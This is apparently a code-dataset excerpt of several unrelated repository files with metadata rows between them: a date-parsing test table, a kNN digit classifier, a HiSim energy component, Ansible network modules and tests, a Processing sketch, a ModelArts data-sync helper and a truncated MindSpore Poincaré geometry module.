"2020-06-21T00:00:00"), ("June 21st 2020 Eastern Standard Time", False, False, True, False, "2020-06-21T00:00:00"), ("June 21st 2020 Eastern Standard Time", False, False, False, False, "June 21st 2020 Eastern Standard Time"), ("The 1st of June 2020", True, True, True, True, "2020-06-01T00:00:00+00:00"), ("The 1st of June 2020", True, False, True, True, "2020-06-01T00:00:00+00:00"), ("The 1st of June 2020", True, True, False, True, "The 1st of June 2020"), ("The 1st of June 2020", True, False, False, True, "The 1st of June 2020"), ("The 1st of June 2020", False, True, True, False, "2020-06-01T00:00:00"), ("The 1st of June 2020", False, False, True, False, "2020-06-01T00:00:00"), ("The 1st of June 2020", False, False, False, False, "The 1st of June 2020"), ('2020-06-11T17:34:35.754Z', False, False, False, True, '2020-06-11T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', True, True, True, True, '2020-11-06T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', True, False, True, True, '2020-11-06T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', True, True, False, True, '2020-11-06T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', True, False, False, True, '2020-11-06T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', False, True, True, False, '2020-06-11T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', False, False, True, False, '2020-06-11T17:34:35.754000+00:00'), ('2020-06-11T17:34:35.754Z', False, False, False, False, '2020-06-11T17:34:35.754000+00:00'), ('Fri, 20 Nov 2020 11:41:42', False, False, False, True, '2020-11-20T11:41:42+00:00'), ('Fri, 20 Nov 2020 11:41:42', True, True, True, True, '2020-11-20T11:41:42+00:00'), ('Fri, 20 Nov 2020 11:41:42', True, False, True, True, '2020-11-20T11:41:42+00:00'), ('Fri, 20 Nov 2020 11:41:42', True, True, False, True, '2020-11-20T11:41:42+00:00'), ('Fri, 20 Nov 2020 11:41:42', True, False, False, True, '2020-11-20T11:41:42+00:00'), ('Fri, 20 Nov 2020 11:41:42', False, True, True, False, '2020-11-20T11:41:42'), ('Fri, 20 Nov 2020 11:41:42', False, False, True, False, '2020-11-20T11:41:42'), ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'), ('Fri, 20 Nov 2020 11:41:42', False, False, False, False, '2020-11-20T11:41:42'), ] @pytest.mark.parametrize('date_value,day_first,year_first,fuzzy,add_utc_timezone,expected_output', testdata) def test_parse_datestring_to_iso(mocker, date_value, day_first, year_first, fuzzy, add_utc_timezone, expected_output): '''Scenario: Parse an arbitrary date string and convert it to ISO 8601 format Given - An arbitrary date string When - The date string can be an ambiguous 3-integer date, fuzzy date string or an already iso-8601 formatted date string Then - Ensure the output date string is in iso-8601 format in all cases Args: date_value (str): A string containing a date stamp. day_first (bool): Whether to interpret the first value in an ambiguous 3-integer date (e.g. 01/05/09) as the day or month. year_first (bool): Whether to interpret the first value in an ambiguous 3-integer date (e.g. 01/05/09) as the year. If ``True``, the first number is taken to be the year, otherwise the last number is taken to be the year. fuzzy (bool): Whether to allow fuzzy parsing, allowing for string like "Today is January 1, 2047 at 8:21:00AM". add_utc_timezone (bool): Whether to add UTC timezone to the date string returned in case offset-naive date was provided as input. expected_output (str): The iso 8601 formatted date to check the result against ''' mocker.patch.object(demisto, 'error') assert parse_datestring_to_iso(date_value, day_first, year_first, fuzzy, add_utc_timezone) == expected_output
71.120482
118
0.655429
5dca870e069c6a0a5d577bc3920a45fd2a1a7e19
5,289
py
Python
KNN/kNN.py
lance52587/MachineLearningNote
0184f8de178990ee31ace2a43809830874313697
[ "MIT" ]
37
2018-06-06T05:58:54.000Z
2022-02-21T04:49:54.000Z
KNN/kNN.py
YYangjlu/MachineLearningNote
d34a9b57af3b2c6f276d14c2a7a3dccadb585421
[ "MIT" ]
null
null
null
KNN/kNN.py
YYangjlu/MachineLearningNote
d34a9b57af3b2c6f276d14c2a7a3dccadb585421
[ "MIT" ]
35
2018-10-01T16:12:34.000Z
2022-02-21T03:35:33.000Z
# -*- coding: utf-8 -*- # @Date : 2017-04-03 15:47:04 # @Author : Alan Lau ([email protected]) # import numpy as np # import distance # import fwalker # import reader # import statistic # def get_data(data_path): # label_vec = [] # files = fwalker.fun(data_path) # for file in files: # ech_label_vec = [] # ech_label = int((file.split('\\'))[-1][0]) # ech_vec = ((np.loadtxt(file)).ravel()) # ech_label_vec.append(ech_label) # ech_label_vec.append(ech_vec) # label_vec.append(ech_label_vec) # return label_vec # def find_label(train_vec_list, vec, k): # get_label_list = [] # for ech_trainlabel_vec in train_vec_list: # ech_label_distance = [] # train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1] # vec_distance = distance.Euclidean(train_vec, vec) # ech_label_distance.append(train_label) # ech_label_distance.append(vec_distance) # get_label_list.append(ech_label_distance) # result_k = np.array(get_label_list) # order_distance = (result_k.T)[1].argsort() # order = np.array((result_k[order_distance].T)[0]) # top_k = np.array(order[:k], dtype=int) # find_label = statistic.orderdic(statistic.statistic(top_k), True)[0][0] # return find_label # def classify(train_vec_list, test_vec_list, k): # error_counter = 0 # for ech_label_vec in test_vec_list: # label, vec = ech_label_vec[0], ech_label_vec[1] # get_label = find_label(train_vec_list, vec, k) # print('Original label is:'+str(label) + # ', kNN label is:'+str(get_label)) # if str(label) != str(get_label): # error_counter += 1 # else: # continue # true_probability = str( # round((1-error_counter/len(test_vec_list))*100, 2))+'%' # print('Correct probability:'+true_probability) # def main(): # k = 3 # train_data_path = r'D:\DevelopmentLanguage\Python\MachineLearning\Learning\KNN\lab3_0930\input_digits\trainingDigits' # test_data_path = r'D:\DevelopmentLanguage\Python\MachineLearning\Learning\KNN\lab3_0930\input_digits\testDigits' # train_vec_list = get_data(train_data_path) # test_vec_list = get_data(test_data_path) # classify(train_vec_list, test_vec_list, k) # if __name__ == '__main__': # main() # -*- coding: utf-8 -*- # @Date : 2017-04-03 15:47:04 # @Author : Alan Lau ([email protected]) import os import math import collections import numpy as np def Euclidean(vec1, vec2): npvec1, npvec2 = np.array(vec1), np.array(vec2) return math.sqrt(((npvec1 - npvec2)**2).sum()) def fwalker(path): fileArray = [] for root, dirs, files in os.walk(path): for fn in files: eachpath = str(root + '\\' + fn) fileArray.append(eachpath) return fileArray def orderdic(dic, reverse): ordered_list = sorted( dic.items(), key=lambda item: item[1], reverse=reverse) return ordered_list def get_data(data_path): label_vec = [] files = fwalker(data_path) for file in files: ech_label_vec = [] ech_label = int((file.split('\\'))[-1][0]) # 获取每个向量的标签 ech_vec = ((np.loadtxt(file)).ravel()) # 获取每个文件的向量 ech_label_vec.append(ech_label) # 将一个文件夹的标签和向量放到同一个list内 ech_label_vec.append( ech_vec ) # 将一个文件夹的标签和向量放到同一个list内,目的是将标签和向量对应起来,类似于字典,这里不直接用字典因为字典的键(key)不可重复。 label_vec.append(ech_label_vec) # 再将所有的标签和向量存入一个list内,构成二维数组 return label_vec def find_label(train_vec_list, vec, k): get_label_list = [] for ech_trainlabel_vec in train_vec_list: ech_label_distance = [] train_label, train_vec = ech_trainlabel_vec[0], ech_trainlabel_vec[1] vec_distance = Euclidean(train_vec, vec) # 计算距离 ech_label_distance.append(train_label) ech_label_distance.append(vec_distance) # 将距离和标签对应存入list get_label_list.append(ech_label_distance) result_k = np.array(get_label_list) order_distance = (result_k.T)[1].argsort() # 对距离进行排序 order = np.array((result_k[order_distance].T)[0]) top_k = np.array(order[:k], dtype=int) # 获取前k距离和标签 find_label = orderdic(collections.Counter(top_k), True)[0][0] # 统计在前k排名中标签出现频次 return find_label def classify(train_vec_list, test_vec_list, k): error_counter = 0 #计数器,计算错误率 for ech_label_vec in test_vec_list: label, vec = ech_label_vec[0], ech_label_vec[1] get_label = find_label(train_vec_list, vec, k) # 获得学习得到的标签 print('Original label is:' + str(label) + ', kNN label is:' + str(get_label)) if str(label) != str(get_label): error_counter += 1 else: continue true_probability = str( round((1 - error_counter / len(test_vec_list)) * 100, 2)) + '%' print('Correct probability:' + true_probability) def main(): k = 3 train_data_path = r'..\KNN\lab3_0930\input_digits\trainingDigits' test_data_path = r'..\KNN\lab3_0930\input_digits\testDigits' train_vec_list = get_data(train_data_path) test_vec_list = get_data(test_data_path) classify(train_vec_list, test_vec_list, k) if __name__ == '__main__': main()
34.568627
123
0.650974
5d30b9642ca02eb7664d764f1fd524886afbe78d
6,643
py
Python
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
null
null
null
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
null
null
null
hisim/components/dummy.py
sdickler/HiSim
09a11d99f220f7cadb3cb7b09a6fce8f147243c8
[ "MIT" ]
1
2022-03-13T16:15:36.000Z
2022-03-13T16:15:36.000Z
# Generic/Built-in import copy import numpy as np from typing import List, Optional # Owned from hisim.component import Component, SingleTimeStepValues, ComponentInput, ComponentOutput from hisim.components.ev_charger import SimpleStorageState from hisim.utils import HISIMPATH from hisim import loadtypes as lt from hisim.utils import load_smart_appliance from hisim import utils import pdb from hisim.simulationparameters import SimulationParameters __authors__ = "Vitor Hugo Bellotto Zago" __copyright__ = "Copyright 2021, the House Infrastructure Project" __credits__ = ["Noah Pflugradt"] __license__ = "MIT" __version__ = "0.1" __maintainer__ = "Vitor Hugo Bellotto Zago" __email__ = "[email protected]" __status__ = "development" class Dummy(Component): """ Component component the supports multiple dummy values for fictitious scenarios. The values passed to the constructor are taken as constants to build the load profile for the entire simulation duration Parameters ---------- electricity : float Constant to define electricity output profile heat : float Constant to define heat output profile capacity : float Stored energy when starting the simulation initial_temperature : float Initial temperature when starting the simulation sim_params: cp.SimulationParameters Simulation parameters used by the setup function: """ ThermalEnergyDelivered = "ThermalEnergyDelivered" # Outputs ElectricityOutput = "ElectricityOutput" TemperatureMean = "Residence Temperature" StoredEnergy="StoredEnergy" def __init__(self, my_simulation_parameters: SimulationParameters, electricity=None, heat=None, capacity=None, initial_temperature=None, ): super().__init__(name="Dummy", my_simulation_parameters=my_simulation_parameters) self.capacity:float self.initial_temperature:float self.build(electricity=electricity, heat=heat, capacity=capacity, initial_temperature=initial_temperature) self.thermal_energy_deliveredC : ComponentInput = self.add_input(self.ComponentName, self.ThermalEnergyDelivered, lt.LoadTypes.Heating, lt.Units.Watt, False) self.t_mC : ComponentOutput = self.add_output(self.ComponentName, self.TemperatureMean, lt.LoadTypes.Temperature, lt.Units.Celsius) self.electricity_outputC: ComponentOutput = self.add_output(self.ComponentName, self.ElectricityOutput, lt.LoadTypes.Electricity, lt.Units.Watt) self.stored_energyC: ComponentOutput = self.add_output(self.ComponentName, self.StoredEnergy, lt.LoadTypes.Heating, lt.Units.Watt) self.temperature:float = -300 def build(self, electricity:Optional[float], heat:float, capacity:Optional[float], initial_temperature:Optional[float]): self.time_correction_factor:float = 1 / self.my_simulation_parameters.seconds_per_timestep self.seconds_per_timestep:float = self.my_simulation_parameters.seconds_per_timestep if electricity is None: self.electricity_output:float = - 1E3 else: self.electricity_output = - 1E3 * electricity if capacity is None: self.capacity = 45 * 121.2 else: self.capacity = capacity if initial_temperature is None: self.temperature = 25 self.initial_temperature = 25 else: self.temperature = initial_temperature self.initial_temperature = initial_temperature self.previous_temperature = self.temperature def write_to_report(self): lines:List =[] return lines def i_save_state(self): self.previous_temperature = self.temperature def i_restore_state(self): self.temperature = self.previous_temperature def i_doublecheck(self, timestep: int, stsv: SingleTimeStepValues): pass def i_simulate(self, timestep: int, stsv: SingleTimeStepValues, force_convergence: bool): electricity_output:float = 0 if timestep >= 60*6 and timestep < 60*9: electricity_output = self.electricity_output elif timestep >= 60*15 and timestep < 60*18: electricity_output = - self.electricity_output stsv.set_output_value(self.electricity_outputC, electricity_output) if timestep <= 60*12: thermal_delivered_energy = 0 temperature:float = self.initial_temperature current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity else: thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC) previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity current_stored_energy = previous_stored_energy + thermal_delivered_energy self.temperature = current_stored_energy / self.capacity - 273.15 temperature = self.temperature #thermal_delivered_energy = 0 #temperature = self.initial_temperature #current_stored_energy = ( self.initial_temperature + 273.15) * self.capacity # else: #thermal_delivered_energy = stsv.get_input_value(self.thermal_energy_deliveredC) #previous_stored_energy = (self.previous_temperature + 273.15) * self.capacity #current_stored_energy = previous_stored_energy + thermal_delivered_energy #self.temperature = current_stored_energy / self.capacity - 273.15 #temperature = self.temperature stsv.set_output_value(self.stored_energyC, current_stored_energy) stsv.set_output_value(self.t_mC, temperature)
41.006173
124
0.617191
dbaaf23f145d5a04f8b02a26023396b77b3dc4df
4,447
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/onyx/test_onyx_pfc_interface.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
# # Copyright: Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from ansible_collections.community.general.tests.unit.compat.mock import patch from ansible_collections.community.general.plugins.modules.network.onyx import onyx_pfc_interface from ansible_collections.community.general.tests.unit.modules.utils import set_module_args from ..onyx_module import TestOnyxModule, load_fixture class TestOnyxPfcInterfaceModule(TestOnyxModule): module = onyx_pfc_interface def setUp(self): super(TestOnyxPfcInterfaceModule, self).setUp() self._pfc_enabled = True self.mock_get_config = patch.object( onyx_pfc_interface.OnyxPfcInterfaceModule, "_get_pfc_config") self.get_config = self.mock_get_config.start() self.mock_load_config = patch( 'ansible_collections.community.general.plugins.module_utils.network.onyx.onyx.load_config') self.load_config = self.mock_load_config.start() self.mock_get_version = patch.object( onyx_pfc_interface.OnyxPfcInterfaceModule, "_get_os_version") self.get_version = self.mock_get_version.start() def tearDown(self): super(TestOnyxPfcInterfaceModule, self).tearDown() self.mock_get_config.stop() self.mock_load_config.stop() self.mock_get_version.stop() def load_fixtures(self, commands=None, transport='cli'): if self._pfc_enabled: suffix = 'enabled' else: suffix = 'disabled' config_file = 'onyx_pfc_interface_%s.cfg' % suffix self.get_config.return_value = load_fixture(config_file) self.load_config.return_value = None self.get_version.return_value = "3.6.5000" def _test_pfc_if(self, if_name, enabled, changed, commands): state = 'enabled' if enabled else 'disabled' set_module_args(dict(name=if_name, state=state)) self.execute_module(changed=changed, commands=commands) def _test_pfc_no_change(self, enabled): interfaces = ('Eth1/1', 'Eth1/1/2', 'Po1', 'Mpo2') changed = False commands = None for ifc in interfaces: self._test_pfc_if(ifc, enabled, changed, commands) def test_pfc_enabled_no_change(self): self._pfc_enabled = True enabled = True self._test_pfc_no_change(enabled) def test_pfc_disabled_no_change(self): self._pfc_enabled = False enabled = False self._test_pfc_no_change(enabled) def _test_pfc_change(self, enabled): cmd_list = [ ('Eth1/1', 'interface ethernet 1/1'), ('Eth1/1/2', 'interface ethernet 1/1/2'), ('Po1', 'interface port-channel 1'), ('Mpo2', 'interface mlag-port-channel 2'), ] changed = True suffix = ' dcb priority-flow-control mode on force' if not enabled: suffix = ' no dcb priority-flow-control mode force' for (if_name, cmd) in cmd_list: commands = [cmd + suffix] self._test_pfc_if(if_name, enabled, changed, commands) def test_pfc_disabled_change(self): self._pfc_enabled = False enabled = True self._test_pfc_change(enabled) def test_pfc_enabled_change(self): self._pfc_enabled = True enabled = False self._test_pfc_change(enabled) def test_pfc_aggregate(self): self._pfc_enabled = False aggregate = [dict(name='Eth1/1'), dict(name='Eth1/1/2')] set_module_args(dict(aggregate=aggregate, state='enabled')) commands = [ 'interface ethernet 1/1 dcb priority-flow-control mode on force', 'interface ethernet 1/1/2 dcb priority-flow-control mode on force'] self.execute_module(changed=True, commands=commands) def test_pfc_aggregate_purge(self): self._pfc_enabled = True aggregate = [dict(name='Po1'), dict(name='Mpo2')] set_module_args(dict(aggregate=aggregate, state='enabled', purge=True)) commands = [ 'interface ethernet 1/1 no dcb priority-flow-control mode force', 'interface ethernet 1/1/2 no dcb priority-flow-control mode force'] self.execute_module(changed=True, commands=commands)
38.669565
103
0.670564
dbc9b69c59fff01ef0e276b0ea84fad1e309986e
818
py
Python
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
4
2018-06-03T02:11:46.000Z
2021-08-18T19:55:15.000Z
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
null
null
null
sketches/natureOfCode/chapter01/mover/mover.py
kantel/processingpy
74aae222e46f68d1c8f06307aaede3cdae65c8ec
[ "MIT" ]
3
2019-12-23T19:12:51.000Z
2021-04-30T14:00:31.000Z
class Mover(object): def __init__(self): self.location = PVector(random(width), random(height)) self.velocity = PVector(random(-5, 5), random(-5, 5)) self.r = 15 def update(self): self.location.add(self.velocity) def display(self): stroke(0) fill(255, 100, 255) ellipse(self.location.x, self.location.y, 2*self.r, 2*self.r) def checkBoundaries(self): if (self.location.x > width + self.r): self.location.x = -self.r elif (self.location.x < -self.r): self.location.x = width + self.r if (self.location.y > height + self.r): self.location.y = -self.r elif (self.location.y < -self.r): self.location.y = height + self.r
28.206897
69
0.530562
919f35df2425fa45d68a62ff250d7f7259d01c3d
5,345
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
#!/usr/bin/python # Copyright: (c) 2018, Pluribus Networks # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: pn_vtep author: "Pluribus Networks (@rajaspachipulusu17)" short_description: CLI command to create/delete vtep description: - This module can be used to create a vtep and delete a vtep. options: pn_cliswitch: description: - Target switch to run the CLI on. required: false type: str state: description: - vtep configuration command. required: false choices: ['present', 'absent'] type: str default: 'present' pn_name: description: - vtep name. required: false type: str pn_ip: description: - Primary IP address. required: false type: str pn_vrouter_name: description: - name of the vrouter service. required: false type: str pn_virtual_ip: description: - Virtual/Secondary IP address. required: false type: str pn_location: description: - switch name. required: false type: str pn_switch_in_cluster: description: - Tells whether switch in cluster or not. required: false type: bool default: True ''' EXAMPLES = """ - name: create vtep pn_vtep: pn_cliswitch: 'sw01' pn_name: 'foo' pn_vrouter_name: 'foo-vrouter' pn_ip: '22.22.22.2' pn_location: 'sw01' pn_virtual_ip: "22.22.22.1" - name: delete vtep pn_vtep: pn_cliswitch: 'sw01' state: 'absent' pn_name: 'foo' """ RETURN = """ command: description: the CLI command run on the target node. returned: always type: str stdout: description: set of responses from the vtep command. returned: always type: list stderr: description: set of error responses from the vtep command. returned: on error type: list changed: description: indicates whether the CLI caused changes on the target. returned: always type: bool """ from ansible.module_utils.basic import AnsibleModule from ansible_collections.community.general.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli from ansible_collections.community.general.plugins.module_utils.network.netvisor.netvisor import run_commands def check_cli(module, cli): """ This method checks for idempotency using the vtep-show command. If a name exists, return True if name exists else False. :param module: The Ansible module to fetch input parameters :param cli: The CLI string """ name = module.params['pn_name'] cli += ' vtep-show format name no-show-headers' out = run_commands(module, cli)[1] if out: out = out.split() return True if name in out else False def main(): """ This section is for arguments parsing """ state_map = dict( present='vtep-create', absent='vtep-delete' ) argument_spec = dict( pn_cliswitch=dict(required=False, type='str'), state=dict(required=False, type='str', choices=state_map.keys(), default='present'), pn_name=dict(required=False, type='str'), pn_ip=dict(required=False, type='str'), pn_vrouter_name=dict(required=False, type='str'), pn_virtual_ip=dict(required=False, type='str'), pn_location=dict(required=False, type='str'), pn_switch_in_cluster=dict(required=False, type='bool', default='True') ) module = AnsibleModule( argument_spec=argument_spec, required_if=( ["state", "present", ["pn_name", "pn_ip", "pn_vrouter_name", "pn_location"]], ["state", "absent", ["pn_name"]], ), ) # Accessing the arguments cliswitch = module.params['pn_cliswitch'] state = module.params['state'] name = module.params['pn_name'] ip = module.params['pn_ip'] vrouter_name = module.params['pn_vrouter_name'] virtual_ip = module.params['pn_virtual_ip'] location = module.params['pn_location'] switch_in_cluster = module.params['pn_switch_in_cluster'] if switch_in_cluster and not virtual_ip and state == 'present': module.exit_json( failed=True, msg='virtual ip is required when switch is in cluster' ) command = state_map[state] # Building the CLI command string cli = pn_cli(module, cliswitch) NAME_EXISTS = check_cli(module, cli) cli += ' %s name %s ' % (command, name) if command == 'vtep-delete': if NAME_EXISTS is False: module.exit_json( skipped=True, msg='vtep with name %s does not exist' % name ) if command == 'vtep-create': if NAME_EXISTS is True: module.exit_json( skipped=True, msg='vtpe with name %s already exists' % name ) cli += 'vrouter-name %s ' % vrouter_name cli += 'ip %s ' % ip cli += 'location %s ' % location if virtual_ip: cli += 'virtual-ip %s ' % virtual_ip run_cli(module, cli, state_map) if __name__ == '__main__': main()
26.20098
111
0.640037
37d2717e8b3e1fa56c025383d7488218b1e125ca
2,176
py
Python
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Moxing adapter for ModelArts""" import os _global_sync_count = 0 def get_device_id(): device_id = os.getenv('DEVICE_ID', '0') return int(device_id) def get_device_num(): device_num = os.getenv('RANK_SIZE', '1') return int(device_num) def get_rank_id(): global_rank_id = os.getenv('RANK_ID', '0') return int(global_rank_id) def get_job_id(): job_id = os.getenv('JOB_ID') job_id = job_id if job_id != "" else "default" return job_id def sync_data(from_path, to_path, threads=16): """ Download data from remote obs to local directory if the first url is remote url and the second one is local path Upload data from local directory to remote obs in contrast. """ import moxing as mox import time global _global_sync_count sync_lock = "/tmp/copy_sync.lock" + str(_global_sync_count) _global_sync_count += 1 # Each server contains 8 devices as most. if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock): print("from path: ", from_path) print("to path: ", to_path) mox.file.copy_parallel(from_path, to_path, threads=threads) print("===finish data synchronization===") try: os.mknod(sync_lock) except IOError: pass print("===save flag===") while True: if os.path.exists(sync_lock): break time.sleep(1) print("Finish sync data from {} to {}.".format(from_path, to_path))
29.808219
116
0.653033
f4352e3f34ff59bdfc8dd2bfbaf3ca6bfe02756d
8,596
py
Python
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/nlp/hypertext/src/poincare.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """poincare file""" import mindspore.numpy as mnp from mindspore.nn import Cell, Norm from mindspore.ops import Shape, ReduceSum, Sqrt, ExpandDims, Tanh, Transpose, matmul, Pow, Reshape, clip_by_value import mindspore.common.dtype as mstype from src.math_utils import Artanh class LorentzFactors(Cell): """lorentz_factors class""" def __init__(self, min_norm): """init""" super(LorentzFactors, self).__init__() self.min_norm = min_norm self.norm = Norm(axis=-1) def construct(self, x): """class construction""" x_norm = self.norm(x) return 1.0 / (1.0 - x_norm ** 2 + self.min_norm) class ClampMin(Cell): """clamp_min class""" def __init__(self): """init fun""" super(ClampMin, self).__init__() self.shape = Shape() def construct(self, tensor, min1): """class construction""" min_mask = (tensor <= min1) min_mask1 = (tensor >= min1) min_add = mnp.ones(self.shape(tensor)) * min1 * min_mask return tensor * min_mask1 + min_add class Proj(Cell): """proj class""" def __init__(self, min_norm): """init fun""" super(Proj, self).__init__() self.clamp_min = ClampMin() self.min_norm = min_norm self.norm_k = Norm(axis=-1, keep_dims=True) self.maxnorm = 1 - 4e-3 def construct(self, x, c): """class construction""" norm = self.clamp_min(self.norm_k(x), self.min_norm) maxnorm = self.maxnorm / (c ** 0.5) cond = norm > maxnorm projected = x / norm * maxnorm return mnp.where(cond, projected, x) class Clamp(Cell): """clamp class""" def __init__(self): super(Clamp, self).__init__() self.shape = Shape() def construct(self, tensor, min1, max1): """class construction""" return clip_by_value(tensor, min1, max1) class Logmap0(Cell): """logmap0 class""" def __init__(self, min_norm): """init fun""" super(Logmap0, self).__init__() self.min_norm = min_norm self.norm_k = Norm(axis=-1, keep_dims=True) self.artanh = Artanh() self.norm_k = Norm(axis=-1, keep_dims=True) self.clamp_min = ClampMin() def construct(self, p, c): """class construction""" sqrt_c = c ** 0.5 p_norm = self.clamp_min(self.norm_k(p), self.min_norm) scale = 1. / sqrt_c * self.artanh(sqrt_c * p_norm) / p_norm return scale * p class KleinToPoincare(Cell): """klein to poincare class""" def __init__(self, min_norm): """init""" super(KleinToPoincare, self).__init__() self.min_norm = min_norm self.sqrt = Sqrt() self.sum = ReduceSum(keep_dims=True) self.proj = Proj(self.min_norm) def construct(self, x, c): """class construction""" x_poincare = x / (1.0 + self.sqrt(1.0 - self.sum(x * x, -1))) x_poincare = self.proj(x_poincare, c) return x_poincare class ToKlein(Cell): """to klein class""" def __init__(self, min_norm): """init fun""" super(ToKlein, self).__init__() self.min_norm = min_norm self.sum = ReduceSum(keep_dims=True) self.klein_constraint = KleinConstraint(self.min_norm) def construct(self, x, c): """class construction""" x_2 = self.sum(x * x, -1) x_klein = 2 * x / (1.0 + x_2) x_klein = self.klein_constraint(x_klein) return x_klein class KleinConstraint(Cell): """klein constraint class""" def __init__(self, min_norm): """init fun""" super(KleinConstraint, self).__init__() self.norm = Norm(axis=-1) self.min_norm = min_norm self.maxnorm = 1 - 4e-3 self.shape = Shape() self.reshape = Reshape() def construct(self, x): """class construction""" last_dim_val = self.shape(x)[-1] norm = self.reshape(self.norm(x), (-1, 1)) maxnorm = self.maxnorm cond = norm > maxnorm x_reshape = self.reshape(x, (-1, last_dim_val)) projected = x_reshape / (norm + self.min_norm) * maxnorm x_reshape = mnp.where(cond, projected, x_reshape) x = self.reshape(x_reshape, self.shape(x)) return x class EinsteinMidpoint(Cell): """einstein mindpoint class""" def __init__(self, min_norm): """init fun""" super(EinsteinMidpoint, self).__init__() self.to_klein = ToKlein(min_norm) self.lorentz_factors = LorentzFactors(min_norm) self.sum = ReduceSum(keep_dims=True) self.unsqueeze = ExpandDims() self.sumFalse = ReduceSum(keep_dims=False) self.klein_constraint = KleinConstraint(min_norm) self.klein_to_poincare = KleinToPoincare(min_norm) def construct(self, x, c): """class construction""" x = self.to_klein(x, c) x_lorentz = self.lorentz_factors(x) x_norm = mnp.norm(x, axis=-1) # deal with pad value x_lorentz = (1.0 - (x_norm == 0.0).astype(mstype.float32)) * x_lorentz x_lorentz_sum = self.sum(x_lorentz, -1) x_lorentz_expand = self.unsqueeze(x_lorentz, -1) x_midpoint = self.sumFalse(x_lorentz_expand * x, 1) / x_lorentz_sum x_midpoint = self.klein_constraint(x_midpoint) x_p = 